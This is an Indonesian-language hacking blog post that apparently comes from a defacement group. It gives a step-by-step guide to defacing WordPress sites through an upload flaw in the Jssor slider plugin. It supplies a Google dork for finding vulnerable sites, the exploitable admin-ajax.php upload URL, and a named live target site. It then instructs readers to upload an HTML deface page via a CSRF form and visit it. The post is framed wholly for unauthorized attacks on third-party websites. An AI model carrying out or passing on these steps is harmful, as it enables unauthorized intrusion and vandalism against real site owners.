Proof of Concept Json Slider with CSRF

 

Hi! Gw SwipeMoon,

Kali ini gw bakal memberitahu cara deface poc Json slider, ini sih poc lama yak, cmn mau ngasih tau ke yg gatau poc ini aja :b


BAHAN :

•DORK :

- inurl:/wp-content/jssor-slider/jssor-uploads/

•EXPLOIT :

- /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library

•CSRF :

KLIK GW

•SCRIPT DEFACE


Oke langsung ae, Pertama kalian ngedork dulu pake dork diatas, kalo w sih pale live target dibawah ini

Live Target : http://maxduhanov.ru/


Lalu masukan Exploit "/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library"

Contoh : http://maxduhanov.ru/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library


Kalau Tampilannya seperti gambar di atas, berarti web tersebut vuln, langsung aja salin URL nya lalu paste kan di CSRF

Kalau sudah, tinggal save lalu buka file CSRF tersebut di chrome / browser

Kalian pencet Choose File, Lalu pilih file deface kalian yang berekstensi .html lalu pencet submit, kalau sudah coba kalian akses script yang sudah kalian upload tadi.

Caranya?

Masukan Exploit berikut

/wp-content/jssor-slider/jssor-uploads/scriptdepes.html

Contoh :

http://maxduhanov.ru/wp-content/jssor-slider/jssor-uploads/scriptdepes.html

Nah sudah berhasil ke upload :b


Sekian aja dari gw


Best Regards,

SwipeMoon

ForceCyberTeam

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel